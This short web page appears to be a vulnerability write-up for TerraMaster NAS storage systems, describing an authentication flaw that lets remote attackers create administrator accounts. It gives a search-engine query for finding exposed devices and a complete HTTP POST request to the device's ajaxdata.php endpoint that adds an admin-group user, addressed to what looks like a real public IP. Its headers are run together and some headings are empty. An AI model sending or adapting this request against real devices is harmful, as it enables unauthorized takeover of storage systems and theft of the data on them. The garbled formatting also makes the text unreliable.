TerraMaster NAS high-risk network storage Vulnerability

TerraMaster NAS high-risk network storage Vulnerability

TerraMaster is a professional international storage brand dedicated to providing professional private cloud storage devices for global users, it includes high-performance, secure, reliable, multi-functional, and environmentally friendly NAS network cloud storage servers and DAS direct-connection storage devices. TerraMaster has a high market share and a good reputation in the banking, insurance, schools, small and medium-sized enterprises and high-end household storage markets.
 

The TerraMaster system enables UPnP and Cloud services by default, so long as the system is connected to the Internet, it can be accessed. Due to the fact that some files do not have strict permission verification, remote attackers can add management accounts at will. After logging on to the system, sensitive information of users or enterprises may be stolen. Tieweima private cloud storage NAS network storage system add Person Management User

Search for "TerraMaster System Management" through the search engine"

You can also enter an existing account name in the http://www.terra-master.com/cloud/, such as admin





POST the following data
 

POST /include/ajax/ajaxdata.php HTTP/1.1x-requested-with: XMLHttpRequestAccept-Language: en-USReferer: http://1.1.1.1:8181/mod/3.UserManage/1.user.phpAccept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 222.139.234.187:8181Content-Length: 230DNT: 1Proxy-Connection: Keep-AlivePragma: no-cacheCookie: PHPSESSID=9cf3113aadad895b1bd9affa3ad6fd1dhandleprocess=adduser&username=admin1&pwd=admin1.2.3.&email=&phone=&quota=0&group=admin%2Callusers&fcreate=0&fname= &fhide=0&flock=0&fdisks=md0&folderids=16%2C15%2C14%2C13%2C12%2C3%2C2%2C1&rights=2%2C2%2C2%2C2%2C2%2C2%2C2%2C2

Home users
 

 

Enterprise Users